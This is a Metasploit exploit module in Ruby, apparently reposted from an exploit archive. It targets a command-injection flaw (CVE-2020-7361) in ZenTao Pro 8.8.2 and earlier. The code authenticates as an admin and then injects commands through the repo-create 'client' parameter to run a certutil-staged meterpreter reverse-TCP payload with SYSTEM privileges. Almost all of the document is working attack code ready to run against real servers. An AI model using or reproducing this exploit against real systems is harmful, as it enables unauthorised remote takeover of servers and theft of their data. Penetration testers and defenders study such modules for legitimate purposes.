Share
## https://sploitus.com/exploit?id=1337DAY-ID-34720
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ZenTao Pro 8.8.2 Remote Code Execution',
        'Description' => %q{
          This module exploits a command injection vulnerability in ZenTao Pro
          8.8.2 and earlier versions in order to execute arbitrary commands with
          SYSTEM privileges.

          The module first attempts to authenticate to the ZenTao dashboard. It
          then tries to execute the payload by submitting fake repositories via
          the 'Repo Create' function that is accessible from the dashboard via
          CI>Repo. More precisely, the module sends HTTP POST requests to
          '/pro/repo-create.html' that inject commands in the vulnerable 'path'
          parameter which corresponds to the 'Client Path' input field.

          Valid credentials for a ZenTao admin account are required. This module
          has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on
          Windows 10 (XAMPP server).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Daniel Monzón', # Discovery
            'Melvin Boers', # PoC
            'Erik Wynter' # @wyntererik - Metasploit
          ],
        'References' =>
          [
            ['EDB', '48633'], # PoC
            ['CVE', '2020-7361']
          ],
        'Platform' => 'win',
        'Targets' =>
          [
            [
              'Windows (x86)', {
                'Arch' => [ARCH_X86],
                'CmdStagerFlavor' => :certutil,
                'DefaultOptions' => {
                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'Windows (x64)', {
                'Arch' => [ARCH_X64],
                'CmdStagerFlavor' => :certutil,
                'DefaultOptions' => {
                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
                }
              }
            ]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Jun 2020'
      )
    )

    register_options [
      OptString.new('TARGETURI', [true, 'The base path to ZenTao', '/pro/']),
      OptString.new('TARGETPATH', [true, 'The path on the target where commands will be executed', 'C:\\Windows\\Temp']),
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
    ]
  end

  def check
    vprint_status('Running check')

    # visit login the page to get the necessary cookies
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'user-login.html')
    unless res
      return CheckCode::Unknown('Connection failed')
    end

    cookie = res.get_cookies
    if cookie.blank?
      return CheckCode::Unknown('Unable to retrieve HTTP cookie header')
    end

    # check if the language is set to English, otherwise change it to English
    unless cookie.scan(/lang=(.*?);/).flatten.first == 'en-US'
      cookie.gsub!(/lang=(.*?);/, 'lang=en;')
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'score-ajax-selectLang.html'),
        'cookie' => cookie
      })

      unless res
        return CheckCode::Unknown('Connection failed')
      end

      @cookie = res.get_cookies
      if @cookie.blank?
        return CheckCode::Unknown('Unable to change the application language to English. Target may not be a ZenTao application')
      end
    end

    # visit login page to check ZenTao version
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'user-login.html'),
      'cookie' => @cookie
    })

    unless res
      return CheckCode::Unknown('Connection failed')
    end

    unless res.code == 200 && res.body.include?('Login - ZenTao')
      return CheckCode::Safe('Target is not a ZenTao application.')
    end

    # obtain cookie and random value necessary to autenticate later
    @cookie = res.get_cookies
    retrieve_rand_val(res)
    if @cookie.blank? || @random_value.blank?
      return CheckCode::Unknown('Unable to obtain the tokens required for authentication')
    end

    # obtain version
    version = res.body.scan(/v=pro(.*?)'/).flatten.first
    if version.blank?
      return CheckCode::Detected('Unable to obtain ZenTao version.')
    end

    @version = Gem::Version.new(version)

    unless @version <= Gem::Version.new('8.8.2')
      return CheckCode::Detected("Target is ZenTao version #{@version}.")
    end

    return CheckCode::Appears("Target is ZenTao version #{@version}.")

  end

  def retrieve_rand_val(res)
    html = res.get_html_document
    @random_value = html.at('input[@name="verifyRand"]')['value']

    fail_with(Failure::NotFound, 'Failed to retrieve token') unless @random_value
  end

  def login
    login_uri = normalize_uri(target_uri.path, 'user-login.html')
    unless @random_value
      res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
      fail_with(Failure::UnexpectedReply, 'Unable to reach login page') unless res
      @cookie = res.get_cookies
      retrieve_rand_val(res)
    end

    # generate md5 hashes required for authentication
    hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)
    final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => login_uri,
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'cookie' => @cookie,
      'headers' => {
        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",
        'X-Requested-With' => 'XMLHttpRequest',
        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
      },
      'vars_post' => {
        'account' => datastore['USERNAME'],
        'password' => final_hash,
        'passwordStrength' => '1',
        'referer' => '/pro/',
        'verifyRand' => @random_value,
        'KeepLogin' => '0'
      }
    })

    unless res
      fail_with(Failure::Disconnected, 'Connection failed')
    end

    unless res.code == 200 && res.body.include?('success')
      fail_with(Failure::NoAccess, 'Failed to authenticate. Please check if you have set the correct username and password.')
    end

    # visit /pro/, which is required to get to the dashboard at /pro/my/
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'cookie' => @cookie,
      'headers' => {
        'Upgrade-Insecure-Requests' => '1',
        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",
      }
    })

    unless res && res.code == 302
      fail_with(Failure::NoAccess, 'Failed to authenticate.')
    end

    # finally visit /pro/my/ and check if we have been authenticated
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'my'),
      'cookie' => @cookie
    })
    unless res && res.code == 200 && res.body.include?('Dashboard - ZenTao')
      fail_with(Failure::NoAccess, 'Failed to authenticate.')
    end
    print_good("Successfully authenticated to ZenTao #{@version}.")
  end

  def execute_command(cmd, _opts = {})
    cmd << ' &&' # this is necessary for compatibility with x86 targets (for x64 the module also works without this)
    repo_uri = normalize_uri(target_uri.path, 'repo-create')
    send_request_cgi({
      'method' => 'POST',
      'uri' => repo_uri,
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'cookie' => @cookie,
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{repo_uri}",
        'X-Requested-With' => 'XMLHttpRequest',
        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
      },
      'vars_post' => {
        'SCM' => 'Git',
        'name' => Rex::Text.rand_text_alpha_lower(6..10),
        'path' => datastore['TARGETPATH'],
        'encoding' => 'utf-8',
        'client' => cmd
      }
    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
  end

  def exploit
    login
    print_status('Executing the payload...')
    execute_cmdstager(background: true)
  end
end

#  0day.today [2020-07-23]  #